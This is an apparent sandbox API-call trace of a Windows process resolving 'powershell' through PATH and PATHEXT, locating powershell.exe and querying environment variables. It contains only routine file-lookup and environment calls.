	[0580.643] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.JS", lpFindFileData=0x1c71dac0 | out: lpFindFileData=0x1c71dac0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0580.643] SetErrorMode (uMode=0x1) returned 0x1
	[0580.643] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c71d920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0580.643] SetErrorMode (uMode=0x1) returned 0x1
	[0580.644] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.JSE", lpFindFileData=0x1c71dac0 | out: lpFindFileData=0x1c71dac0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0580.644] SetErrorMode (uMode=0x1) returned 0x1
	[0580.644] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c71d920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0580.644] SetErrorMode (uMode=0x1) returned 0x1
	[0580.644] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.WSF", lpFindFileData=0x1c71dac0 | out: lpFindFileData=0x1c71dac0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0580.645] SetErrorMode (uMode=0x1) returned 0x1
	[0580.645] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c71d920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0580.645] SetErrorMode (uMode=0x1) returned 0x1
	[0580.645] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.WSH", lpFindFileData=0x1c71dac0 | out: lpFindFileData=0x1c71dac0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0580.645] SetErrorMode (uMode=0x1) returned 0x1
	[0580.645] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c71d920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0580.646] SetErrorMode (uMode=0x1) returned 0x1
	[0580.646] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.MSC", lpFindFileData=0x1c71dac0 | out: lpFindFileData=0x1c71dac0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0580.646] SetErrorMode (uMode=0x1) returned 0x1
	[0580.646] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c71d920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0580.646] SetErrorMode (uMode=0x1) returned 0x1
	[0580.646] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell", lpFindFileData=0x1c71dac0 | out: lpFindFileData=0x1c71dac0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0580.647] SetErrorMode (uMode=0x1) returned 0x1
	[0580.647] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c71d920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0580.647] SetErrorMode (uMode=0x1) returned 0x1
	[0580.647] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.ps1", lpFindFileData=0x1c71dac0 | out: lpFindFileData=0x1c71dac0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0580.647] SetErrorMode (uMode=0x1) returned 0x1
	[0580.648] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c71d920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0580.648] SetErrorMode (uMode=0x1) returned 0x1
	[0580.648] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.psm1", lpFindFileData=0x1c71dac0 | out: lpFindFileData=0x1c71dac0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0580.648] SetErrorMode (uMode=0x1) returned 0x1
	[0580.648] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c71d920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0580.648] SetErrorMode (uMode=0x1) returned 0x1
	[0580.649] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.psd1", lpFindFileData=0x1c71dac0 | out: lpFindFileData=0x1c71dac0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0580.649] SetErrorMode (uMode=0x1) returned 0x1
	[0580.649] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c71d920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0580.649] SetErrorMode (uMode=0x1) returned 0x1
	[0580.649] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.COM", lpFindFileData=0x1c71dac0 | out: lpFindFileData=0x1c71dac0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0580.650] SetErrorMode (uMode=0x1) returned 0x1
	[0580.650] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c71d920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0580.650] SetErrorMode (uMode=0x1) returned 0x1
	[0580.650] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.EXE", lpFindFileData=0x1c71dac0 | out: lpFindFileData=0x1c71dac0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0580.650] SetErrorMode (uMode=0x1) returned 0x1
	[0580.650] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c71d920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0582.369] SetErrorMode (uMode=0x1) returned 0x1
	[0582.369] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.BAT", lpFindFileData=0x1c71dac0 | out: lpFindFileData=0x1c71dac0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0582.369] SetErrorMode (uMode=0x1) returned 0x1
	[0582.370] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c71d920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0582.370] SetErrorMode (uMode=0x1) returned 0x1
	[0582.370] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.CMD", lpFindFileData=0x1c71dac0 | out: lpFindFileData=0x1c71dac0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0582.370] SetErrorMode (uMode=0x1) returned 0x1
	[0582.370] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c71d920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0582.370] SetErrorMode (uMode=0x1) returned 0x1
	[0582.371] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.VBS", lpFindFileData=0x1c71dac0 | out: lpFindFileData=0x1c71dac0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0582.371] SetErrorMode (uMode=0x1) returned 0x1
	[0582.371] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c71d920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0582.371] SetErrorMode (uMode=0x1) returned 0x1
	[0582.371] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.VBE", lpFindFileData=0x1c71dac0 | out: lpFindFileData=0x1c71dac0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0582.371] SetErrorMode (uMode=0x1) returned 0x1
	[0582.372] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c71d920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0582.372] SetErrorMode (uMode=0x1) returned 0x1
	[0582.372] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.JS", lpFindFileData=0x1c71dac0 | out: lpFindFileData=0x1c71dac0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0582.372] SetErrorMode (uMode=0x1) returned 0x1
	[0582.372] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c71d920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0582.372] SetErrorMode (uMode=0x1) returned 0x1
	[0582.372] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.JSE", lpFindFileData=0x1c71dac0 | out: lpFindFileData=0x1c71dac0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0582.373] SetErrorMode (uMode=0x1) returned 0x1
	[0582.373] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c71d920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0582.373] SetErrorMode (uMode=0x1) returned 0x1
	[0582.373] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.WSF", lpFindFileData=0x1c71dac0 | out: lpFindFileData=0x1c71dac0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0582.373] SetErrorMode (uMode=0x1) returned 0x1
	[0582.373] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c71d920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0582.374] SetErrorMode (uMode=0x1) returned 0x1
	[0582.374] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.WSH", lpFindFileData=0x1c71dac0 | out: lpFindFileData=0x1c71dac0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0582.374] SetErrorMode (uMode=0x1) returned 0x1
	[0582.374] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c71d920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0582.374] SetErrorMode (uMode=0x1) returned 0x1
	[0582.374] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.MSC", lpFindFileData=0x1c71dac0 | out: lpFindFileData=0x1c71dac0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0582.375] SetErrorMode (uMode=0x1) returned 0x1
	[0582.375] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c71d920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0582.375] SetErrorMode (uMode=0x1) returned 0x1
	[0582.375] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell", lpFindFileData=0x1c71dac0 | out: lpFindFileData=0x1c71dac0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0582.375] SetErrorMode (uMode=0x1) returned 0x1
	[0582.375] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c71d920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0582.375] SetErrorMode (uMode=0x1) returned 0x1
	[0582.376] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.ps1", lpFindFileData=0x1c71dac0 | out: lpFindFileData=0x1c71dac0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0582.376] SetErrorMode (uMode=0x1) returned 0x1
	[0582.376] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c71d920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0582.376] SetErrorMode (uMode=0x1) returned 0x1
	[0582.376] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.psm1", lpFindFileData=0x1c71dac0 | out: lpFindFileData=0x1c71dac0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0582.376] SetErrorMode (uMode=0x1) returned 0x1
	[0582.377] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c71d920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0582.377] SetErrorMode (uMode=0x1) returned 0x1
	[0582.377] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.psd1", lpFindFileData=0x1c71dac0 | out: lpFindFileData=0x1c71dac0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0582.377] SetErrorMode (uMode=0x1) returned 0x1
	[0582.377] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c71d920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0582.377] SetErrorMode (uMode=0x1) returned 0x1
	[0582.377] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.COM", lpFindFileData=0x1c71dac0 | out: lpFindFileData=0x1c71dac0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0582.378] SetErrorMode (uMode=0x1) returned 0x1
	[0582.378] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c71d920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0582.378] SetErrorMode (uMode=0x1) returned 0x1
	[0582.378] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.EXE", lpFindFileData=0x1c71dac0 | out: lpFindFileData=0x1c71dac0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82dd7f7c, ftCreationTime.dwHighDateTime=0x1ca0414, ftLastAccessTime.dwLowDateTime=0x82dd7f7c, ftLastAccessTime.dwHighDateTime=0x1ca0414, ftLastWriteTime.dwLowDateTime=0xe84fc9b0, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x73a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="powershell.exe", cAlternateFileName="")) returned 0x33e5f0
	[0582.379] FindNextFileW (in: hFindFile=0x33e5f0, lpFindFileData=0x1c71dad0 | out: lpFindFileData=0x1c71dad0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82dd7f7c, ftCreationTime.dwHighDateTime=0x1ca0414, ftLastAccessTime.dwLowDateTime=0x82dd7f7c, ftLastAccessTime.dwHighDateTime=0x1ca0414, ftLastWriteTime.dwLowDateTime=0xe84fc9b0, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x73a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="powershell.exe", cAlternateFileName="")) returned 0
	[0582.379] FindClose (in: hFindFile=0x33e5f0 | out: hFindFile=0x33e5f0) returned 1
	[0582.380] SetErrorMode (uMode=0x1) returned 0x1
	[0582.380] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", nBufferLength=0x105, lpBuffer=0x1c71dbe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpFilePart=0x0) returned 0x39
	[0582.381] SetErrorMode (uMode=0x1) returned 0x1
	[0582.381] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"), fInfoLevelId=0x0, lpFileInformation=0x1c71ddf0 | out: lpFileInformation=0x1c71ddf0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82dd7f7c, ftCreationTime.dwHighDateTime=0x1ca0414, ftLastAccessTime.dwLowDateTime=0x82dd7f7c, ftLastAccessTime.dwHighDateTime=0x1ca0414, ftLastWriteTime.dwLowDateTime=0xe84fc9b0, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x73a00)) returned 1
	[0582.381] SetErrorMode (uMode=0x1) returned 0x1
	[0582.382] CoTaskMemAlloc (cb=0x104) returned 0x30af90
	[0582.382] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x30af90, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0582.382] CoTaskMemFree (pv=0x30af90) 
	[0582.384] CoTaskMemAlloc (cb=0x104) returned 0x30af90
	[0582.384] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x30af90, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0582.384] CoTaskMemFree (pv=0x30af90) 
	[0582.387] CoTaskMemAlloc (cb=0x104) returned 0x30af90
	[0582.387] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x30af90, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0582.387] CoTaskMemFree (pv=0x30af90) 
	[0582.397] CoTaskMemAlloc (cb=0x104) returned 0x30af90
	[0582.397] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x30af90, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0582.397] CoTaskMemFree (pv=0x30af90) 
	[0582.411] CoTaskMemAlloc (cb=0x3b) returned 0x1b865fa0
	[0582.411] SHGetFileInfoA (in: pszPath="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", dwFileAttributes=0x0, psfi=0x1c71dfd8, cbFileInfo=0x168, uFlags=0x2000 | out: psfi=0x1c71dfd8) returned 0x4550
	[0583.872] CoTaskMemFree (pv=0x1b865fa0) 
	[0583.875] GetConsoleWindow () returned 0x102c0
	[0583.898] CoTaskMemAlloc (cb=0x104) returned 0x30af90
	[0583.898] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x30af90, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0583.898] CoTaskMemFree (pv=0x30af90) 
	[0583.900] CoTaskMemAlloc (cb=0x104) returned 0x30af90
	[0583.900] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x30af90, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
